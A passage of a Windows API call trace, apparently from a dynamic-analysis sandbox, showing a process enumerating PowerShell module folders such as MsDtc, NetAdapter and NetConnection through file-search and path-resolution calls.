	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.922] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.922] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.922] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.922] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.922] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.922] FindClose (in: hFindFile=0x1505fab8280 | out: hFindFile=0x1505fab8280) returned 1
	[0046.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.923] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38
	[0046.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.923] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.923] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38
	[0046.923] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39
	[0046.923] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab89a0
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.924] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.925] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.926] FindClose (in: hFindFile=0x1505fab89a0 | out: hFindFile=0x1505fab89a0) returned 1
	[0046.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.926] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1")) returned 0x20
	[0046.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.927] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d
	[0046.927] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e
	[0046.927] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8220
	[0046.936] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0046.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.937] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d
	[0046.937] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e
	[0046.937] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8100
	[0046.942] FindClose (in: hFindFile=0x1505fab8100 | out: hFindFile=0x1505fab8100) returned 1
	[0046.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.943] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d
	[0046.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.943] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1
	[0046.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.943] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d
	[0046.943] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e
	[0046.943] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8100
	[0046.966] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.966] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.966] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.966] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.966] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.967] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.968] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.969] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.970] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.971] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.971] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.971] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.971] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.971] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.971] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.971] FindClose (in: hFindFile=0x1505fab8100 | out: hFindFile=0x1505fab8100) returned 1
	[0046.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.972] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20
	[0046.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.975] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0046.977] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.977] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.977] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.977] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.977] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.977] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.977] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.978] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab86a0
	[0046.979] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.979] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.979] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.979] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.979] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.979] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.981] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40
	[0046.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.982] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7260
	[0046.982] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.983] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.983] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.983] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.983] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.983] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.989] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7da0
	[0046.990] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.990] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.990] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.991] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.991] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.010] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1")) returned 0x20
	[0047.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
